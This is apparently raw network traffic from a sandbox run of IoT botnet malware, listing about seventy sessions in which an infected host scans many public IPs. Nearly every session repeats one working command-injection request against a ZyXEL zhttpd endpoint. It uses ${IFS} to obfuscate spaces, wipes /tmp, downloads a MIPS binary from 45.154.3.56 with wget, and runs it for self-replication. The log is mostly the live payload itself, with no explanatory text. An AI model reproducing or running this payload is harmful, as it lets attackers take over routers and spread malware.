                        3035192.168.2.145007285.144.59.14443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.213884115 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3036192.168.2.144563251.160.137.176443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.213954926 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3037192.168.2.1457040148.89.95.67443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.213983059 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3038192.168.2.1453070140.85.107.254443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.214035988 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3039192.168.2.145430499.205.213.50443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.214087963 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3040192.168.2.1452568126.130.123.33443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.217865944 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3041192.168.2.1449748186.27.237.182443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.217921019 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3042192.168.2.1436616216.94.54.194443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.217963934 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3043192.168.2.1441238167.148.73.162443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.217988968 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3044192.168.2.1444260177.77.229.107443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.218017101 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3045192.168.2.1459610176.61.179.90443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.218065023 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3046192.168.2.144497680.164.212.215443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.218122005 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3047192.168.2.145108845.89.16.42443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.218153000 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3048192.168.2.1443230134.32.69.143443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.218184948 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3049192.168.2.1436932141.241.74.42443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.218249083 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3050192.168.2.1442798143.253.211.39443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.218287945 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3051192.168.2.144080012.87.198.72443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.218310118 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3052192.168.2.1435408219.11.111.2443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.218348026 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3053192.168.2.1436822200.199.230.20443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.218380928 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3054192.168.2.143767039.181.194.43443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.218436003 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3055192.168.2.14582608.23.40.172443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.218450069 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3056192.168.2.1453390199.127.98.163443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.218511105 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3057192.168.2.1442358148.5.140.50443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.218550920 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3058192.168.2.1456722198.249.175.238443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.218600988 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3059192.168.2.145572085.209.94.83443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.218641996 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3060192.168.2.1453912108.220.188.10443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:40.212800980 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3061192.168.2.14369361.140.204.56443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:40.212863922 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3062192.168.2.1450924157.67.31.198443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:40.212939024 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3063192.168.2.1450576218.199.220.42443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:40.212997913 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3064192.168.2.1450338174.214.252.135443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:40.213088036 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3065192.168.2.1434934117.8.220.94443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:40.213145971 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3066192.168.2.144156872.240.220.130443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:40.213186026 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3067192.168.2.1437704201.24.10.87443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:40.213392019 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3068192.168.2.143442062.80.72.2443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.223432064 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3069192.168.2.1455030196.45.228.70443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.223470926 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3070192.168.2.1448040139.186.33.75443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.223493099 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3071192.168.2.1452198110.202.8.198443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.223550081 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3072192.168.2.1438856167.196.35.31443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.223586082 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3073192.168.2.14445849.53.34.181443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.223628044 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3074192.168.2.145698895.109.41.239443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.223650932 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3075192.168.2.14411301.207.177.252443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.223694086 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3076192.168.2.143319093.48.215.20443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.223751068 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3077192.168.2.1443676169.111.201.60443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.223789930 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3078192.168.2.1438560103.187.173.107443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.223804951 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3079192.168.2.1444292168.78.175.15443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.223870993 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3080192.168.2.144684282.252.77.110443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.223886967 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3081192.168.2.1443010170.159.164.225443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.223929882 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3082192.168.2.1443582131.117.119.179443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.223967075 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3083192.168.2.1445712155.12.226.184443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.224020004 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3084192.168.2.144653852.240.158.112443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.224056005 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3085192.168.2.1436568109.151.88.148443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.224080086 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3086192.168.2.143293035.162.252.67443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.224117994 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3087192.168.2.1433072176.234.252.36443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.224145889 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3088192.168.2.1441584219.120.192.204443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.224211931 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3089192.168.2.143280493.170.116.152443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.224236965 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3090192.168.2.144251874.188.198.157443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.224293947 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3091192.168.2.1452174170.214.244.226443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.224324942 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3092192.168.2.1449770118.108.52.182443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.224384069 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3093192.168.2.1453810201.62.252.63443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.224423885 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3094192.168.2.144721845.103.42.100443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.224447966 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3095192.168.2.1436848148.239.176.6443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.224477053 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3096192.168.2.1437380110.165.239.154443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.224498034 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3097192.168.2.1436962138.88.158.45443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.224560022 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3098192.168.2.1435608162.101.130.96443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.224587917 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3099192.168.2.1455066155.28.230.106443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.224642992 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3100192.168.2.1443764135.254.206.149443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.224668026 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3101192.168.2.144533648.191.24.106443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.224703074 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3102192.168.2.1437224197.212.182.159443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.224740982 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3103192.168.2.1438794123.93.22.249443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.224771976 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3104192.168.2.1434714140.169.96.255443
                        TimestampBytes transferredDirectionData
